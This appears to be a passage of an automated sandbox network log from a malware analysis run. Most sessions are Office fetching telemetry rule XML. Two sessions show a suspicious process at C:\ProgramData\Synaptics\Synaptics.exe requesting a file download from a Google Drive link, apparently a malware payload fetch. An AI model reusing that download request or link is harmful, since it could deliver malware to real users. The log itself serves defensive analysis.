                                                                                        2024-12-05 21:50:52 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        106192.168.2.54990213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:51 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:52 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:51 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B984BF177"
                                                                                        x-ms-request-id: 72953a3b-301e-0000-41cd-45eecc000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215051Z-1746fd949bdfg4slhC1EWR34t0000000034g00000000hsvw
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:52 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        107192.168.2.54990313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:51 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:52 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:52 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 468
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                        ETag: "0x8DC582BBA642BF4"
                                                                                        x-ms-request-id: 626f2b07-401e-0015-15d1-450e8d000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215052Z-1746fd949bdqpttnhC1EWRe1wg000000031000000000f07q
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:52 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        108192.168.2.54990413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:51 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:52 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:52 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 405
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                        ETag: "0x8DC582B942B6AFF"
                                                                                        x-ms-request-id: 92011275-e01e-0033-54c3-454695000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215052Z-1746fd949bdwt8wrhC1EWRu6rg00000003ag00000000xqk4
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:52 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        109192.168.2.549910172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:52 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:53 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:53 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-N_-JelL3M6P17mf59pCcDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        110192.168.2.549911172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:52 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:53 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:53 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-QoSTUgD37SrsAA6sGE7ANg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        111192.168.2.54991213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:52 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:53 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:53 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 174
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                        ETag: "0x8DC582B91D80E15"
                                                                                        x-ms-request-id: e8edc24c-801e-0083-0ecc-45f0ae000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215053Z-1746fd949bdjrnwqhC1EWRpg28000000037g00000000y05r
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:53 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        112192.168.2.54991313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:53 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:54 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:54 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1952
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                        ETag: "0x8DC582B956B0F3D"
                                                                                        x-ms-request-id: 3e1c70e6-d01e-0028-76c3-457896000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215054Z-1746fd949bd4w8sthC1EWR7004000000032000000000bsh5
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:54 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        113192.168.2.54991613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:53 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:54 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:54 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 958
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                        ETag: "0x8DC582BA0A31B3B"
                                                                                        x-ms-request-id: 4927bbd2-c01e-000b-53cc-45e255000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215054Z-1746fd949bdtlp5chC1EWRq1v4000000033g000000010dsf
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:54 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        114192.168.2.54991713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:54 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:54 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:54 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 501
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                        ETag: "0x8DC582BACFDAACD"
                                                                                        x-ms-request-id: d9e4b0b5-a01e-006f-29a0-4613cd000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215054Z-1746fd949bdkw94lhC1EWRxuz400000003hg000000001rty
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:54 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        115192.168.2.54991813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:54 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:54 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:54 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 2592
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                        ETag: "0x8DC582BB5B890DB"
                                                                                        x-ms-request-id: 8db94728-c01e-0034-79d1-452af6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215054Z-1746fd949bd2cq7chC1EWRnx9g00000002z0000000009pmn
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:54 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        116192.168.2.54991913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:55 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:55 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:55 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 3342
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                        ETag: "0x8DC582B927E47E9"
                                                                                        x-ms-request-id: c43eeb18-901e-008f-6ecb-4567a6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215055Z-1746fd949bdwt8wrhC1EWRu6rg00000003dg00000000hyh8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
